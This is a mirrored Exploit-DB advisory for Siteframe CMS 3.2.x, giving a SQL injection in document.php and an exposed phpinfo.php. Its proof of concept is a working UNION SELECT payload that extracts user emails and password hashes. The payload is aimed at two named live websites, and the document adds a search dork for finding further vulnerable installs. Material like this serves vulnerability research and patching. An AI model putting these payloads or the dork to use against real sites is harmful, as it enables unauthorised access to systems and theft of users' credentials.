bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/9098.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

74 lines
2.3 KiB
Text
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

========================================================================================================================================================
[o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability
Software : Siteframe CMS version 3.2.x
Vendor : http://siteframe.org/
Download : http://sitefrane.org/downloads/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
========================================================================================================================================================
[o] Description
Siteframe™ is a lightweight content-management system
designed for the rapid deployment of community-based websites.
With Siteframe, a group of users can share stories and photographs,
create blogs, send email to one another, and participate in group activities.
Siteframe enables this by providing web-based content management
so that anyone can create content without needing to learn HTML.
[o] Vulnerable file
document.php
[o] Exploit
http://localhost/[path]/document.php?id=[SQL]
http://localhost/[path]/phpinfo.php
[o] Proof of concept
http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://digi-forum.com/frame/phpinfo.php
http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://myolympus.org/phpinfo.php
[o] Dork
"Powered by Siteframe"
[o] Notes
Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)
========================================================================================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/news ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
========================================================================================================================================================
# milw0rm.com [2009-07-09]
Reference in a new issue View git blame Copy permalink